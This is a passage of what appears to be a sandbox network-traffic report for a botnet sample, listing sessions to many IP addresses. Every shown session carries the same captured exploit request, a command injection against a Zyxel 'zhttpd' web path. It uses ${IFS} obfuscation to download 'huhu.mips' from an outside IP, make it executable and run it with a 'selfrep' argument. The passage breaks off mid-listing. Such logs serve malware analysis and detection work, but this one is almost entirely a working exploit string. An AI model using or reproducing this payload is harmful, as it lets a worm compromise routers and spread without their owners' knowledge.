                                                        Feb 2, 2024 06:21:30.345716953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9480192.168.2.144929088.27.229.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345761061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9481192.168.2.1435300151.26.150.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345803976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9482192.168.2.1455408160.153.237.252443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345832109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9483192.168.2.1449996145.82.218.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345871925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9484192.168.2.1435030151.215.245.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345912933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9485192.168.2.144575012.155.30.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345937014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9486192.168.2.1454182140.55.93.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.345993042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9487192.168.2.1441906148.82.176.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346035004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9488192.168.2.1447436219.57.117.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346105099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9489192.168.2.1436828143.84.128.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346137047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9490192.168.2.1438354119.241.230.179443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346165895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9491192.168.2.146072280.97.105.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346208096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9492192.168.2.144107427.76.62.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346229076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9493192.168.2.1444014142.157.82.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346271038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9494192.168.2.1452186150.229.121.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346330881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9495192.168.2.1459880108.10.44.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346379042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9496192.168.2.1447092213.254.51.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346417904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9497192.168.2.1447764106.119.129.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346450090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9498192.168.2.143788817.165.189.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346484900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9499192.168.2.1444754188.11.231.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346494913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9500192.168.2.1451422128.217.229.70443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346532106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9501192.168.2.1435614179.138.112.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346606016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9502192.168.2.1455440159.216.202.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346631050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9503192.168.2.144029239.196.197.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346673012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9504192.168.2.1448788114.150.152.211443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346693993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9505192.168.2.143570214.41.133.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346771002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9506192.168.2.145292651.141.18.1443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346801043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9507192.168.2.145505278.92.247.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346810102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9508192.168.2.145030291.125.113.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346859932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9509192.168.2.1442026106.101.46.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346909046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9510192.168.2.14437665.209.18.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346947908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9511192.168.2.1440180163.246.133.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.346986055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9512192.168.2.1434196128.207.241.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347052097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9513192.168.2.1439532163.155.140.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347085953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9514192.168.2.1439226135.106.190.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347132921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9515192.168.2.14608525.209.82.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347167015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9516192.168.2.1444302134.71.10.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347197056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9517192.168.2.144671845.89.58.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347264051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9518192.168.2.145882023.224.95.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347290993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9519192.168.2.1446152102.92.185.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347331047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9520192.168.2.145468686.44.100.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347357988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9521192.168.2.1456664193.110.158.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347407103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9522192.168.2.143983470.214.134.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347449064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9523192.168.2.143298472.208.151.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347486973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9524192.168.2.145545227.133.116.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347532034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9525192.168.2.144935862.117.110.243443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347552061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9526192.168.2.1456306199.189.8.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347609997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9527192.168.2.1433496218.173.144.9443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347631931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9528192.168.2.1444706112.71.38.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347693920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9529192.168.2.1459002182.152.120.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347722054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9530192.168.2.1453012153.70.105.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347755909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9531192.168.2.1449598155.108.1.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347801924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9532192.168.2.1456600184.65.191.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347840071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9533192.168.2.1457002111.158.101.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347893953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9534192.168.2.143949083.8.32.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347929955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9535192.168.2.1452684100.25.159.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.347966909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9536192.168.2.144583853.74.137.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348011971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9537192.168.2.1460790103.0.201.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348052025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9538192.168.2.1451396147.157.197.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348088026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9539192.168.2.145946831.58.214.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348118067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9540192.168.2.144550698.174.61.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348166943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9541192.168.2.1447030134.181.194.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:30.348206043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        9542192.168.2.1438202113.86.114.233443
                                                        TimestampBytes transferredDirectionData
